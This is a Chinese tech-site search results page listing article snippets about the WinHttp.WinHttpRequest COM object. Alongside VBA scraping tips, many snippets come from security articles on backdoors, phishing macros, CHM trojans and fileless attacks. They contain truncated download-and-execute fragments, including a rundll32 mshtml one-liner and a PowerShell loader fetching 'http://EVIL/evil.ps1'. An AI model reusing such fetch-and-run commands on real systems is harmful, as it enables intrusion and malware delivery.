首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏Eureka的技术时光轴

    使用WinHttpRequest伪造referer

    winhttprequest,使用WinHttpRequest伪造referer,winhttprequest示例代码,winhttprequest入门教程,winhttprequest高级使用教程 从msdn得知,WinHttp.WinHttpRequest.5.1 是 msxml 4.0 的底层对象,也就是说 XMLHTTP/ServerXMLHTTP 也是在它的基础上封装而来。 用 WinHttpRequest 发的请求,连 Fiddler 也监测不到,看来确实是比较底层的东西。 = RemoteCall("GET", "http://www.cnblogs.com", null, json); WScript.Echo(objThird.responseText); WinHttpRequest 上面的代码其实已经有一定恶意,我只为证明使用 WinHttpRequest 确实可以模拟浏览器发送请求,服务端也无法区别是从浏览器来的,还是从命令行来的。

    3.2K10发布于 2020-05-25
  • 来自专栏全栈程序员必看

    WinHttp用法(WinHttp.WinHttpRequest.5.1方法,属性)

    使用WinHttpRequest伪造HTTP头信息,伪造Referer等信息 由于微软封锁了XmlHttp对象,所以无法伪造部分HTTP头信息,但是WinHttp.WinHttpRequest.5.1 从msdn得知,WinHttp.WinHttpRequest.5.1是msxml4.0的底层对象,也就是说XMLHTTP/ServerXMLHTTP也是在它的基础上封装而来,WinHttpRequestWinHttpRequest 对象定义以下属性。 WinHttpRequest 对象定义的下列事件。 该 WinHttpRequest 对象使用 IErrorInfo 接口来提供错误数据。

    3.8K10编辑于 2022-09-15
  • 来自专栏Ms08067安全实验室

    利用Javascript做后门的利用方式

    \mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open \mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open

    64320发布于 2020-03-19
  • 来自专栏黑白天安全团队

    一些有趣的powershell加载命令

    $ h = new-object -com WinHttp.WinHttpRequest.5.1; $ h.open('GET',' http://EVIL/evil.ps1',$false); $

    1.8K10发布于 2021-03-16
  • 来自专栏鸿鹄实验室

    渗透测试的一些tips

    http://192.168.1.115/robots.txt" E:\PDF\robots.txt js 读: var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest /nologo downfile.js http://192.168.1.115/robots.txt 写: var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest

    64430发布于 2021-04-15
  • 来自专栏办公魔盒

    VBA 最简单的爬虫实列(静态网页HTML解析)

    : iurl = "https://www.kuaidaili.com/free/inha/" & pages ''读取网页源码 With CreateObject("WinHttp.WinHttpRequest

    4K20发布于 2021-11-02
  • 来自专栏Khan安全团队

    红队笔记 - PowerShell AMSI Bypass

    Net.WebClient).DownloadString('http://10.10.16.7/PowerView.obs.ps1') 非代理 $h=new-object -com WinHttp.WinHttpRequest

    1.3K20发布于 2021-10-12
  • 来自专栏鸿鹄实验室

    钓鱼常用的vba代码

    =value1&var2=value2&var3=value3"' Dim objHTTP As Object Set objHTTP = CreateObject("WinHttp.WinHttpRequest

    1.2K40发布于 2021-04-15
  • 来自专栏友人a的笔记丶

    VBA编写笔记:常用的对象和方法

    操作窗口排列等等 Internet.application ,IE浏览器 VBScript.RegExp,正则对象 MSXML2.XmlHttp,用于HTTP获取数据(GET、POST) WinHttp.WinHttpRequest

    2.9K20编辑于 2023-02-17
  • 来自专栏农夫安全

    渗透技巧——从github下载文件的多种方法

    ado.Write http.responseBody ado.SaveToFile "c:\download\a.exe" ado.Close 注: 该思路来自@mosin @索马里海贼 也可以通过WinHttp.WinHttpRequest Const adTypeBinary = 1 Const adSaveCreateOverWrite = 2 Dim http,ado Set http = CreateObject("WinHttp.WinHttpRequest

    4.2K20发布于 2019-07-31
  • 来自专栏程序猿的栖息地

    制作chm格式木马病毒

    \mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open \mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open

    6.2K10编辑于 2022-04-29
  • 来自专栏Bypass

    通过命令下载执行恶意代码的几种姿势

    \mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open

    2.6K20发布于 2020-08-27
  • 来自专栏网络安全攻防

    红蓝对抗之无文件落地攻击

    \mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open

    45310编辑于 2024-06-08
  • 来自专栏Bypass

    Windows文件下载执行的15种姿势

    \mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open

    4.6K11发布于 2020-04-26
  • 来自专栏Excel催化剂

    Excel催化剂开源第41波-网络采集类库及工具分享

    在VBA开发网抓程序中,会用到xmlhttp/winHttp.winHttprequest.5.1等组件,当时笔者也是这样进入了网抓领域的,这些都是非常过时的东西,在.Net的开发中,有大量的更好用的轮子使用

    1.4K30发布于 2021-08-19
  • 来自专栏网络安全攻防

    无文件落地攻击

    \mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open

    2.4K40发布于 2021-07-21
  • 来自专栏网络安全攻防

    内网渗透之无文件落地攻击

    \mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open

    84400编辑于 2024-12-24
  • 来自专栏企鹅号快讯

    Bruce.Wang-记一次对JS木马分析

    "%SystemRoot%\\SysWOW64\\rundll32.exe" + "" 下载恶意文件 创建 http 请求对象,其中 Zm6 表示 [MSXML2.XMLHTTP,WinHttp.WinHttpRequest

    1.5K60发布于 2018-02-20
  • 来自专栏安恒网络空间安全讲武堂

    记一次JS木马分析

    创建 http 请求对象,其中 Zm6 表示 [MSXML2.XMLHTTP,WinHttp.WinHttpRequest.5.1] 这 2 个都是能实现 HTTP 请求响应的组件,这里是尝试创建这其中任意一个组件对象

    4.7K80发布于 2018-02-06
  • 来自专栏Seebug漏洞平台

    对某单位的 APT 攻击样本分析

    通过调用WinHttp.WinHttpRequest模块的方法Get请求来获取Response并写入到文件gc43d4unx.exe中。 ? ?

    1.2K20发布于 2019-08-21
领券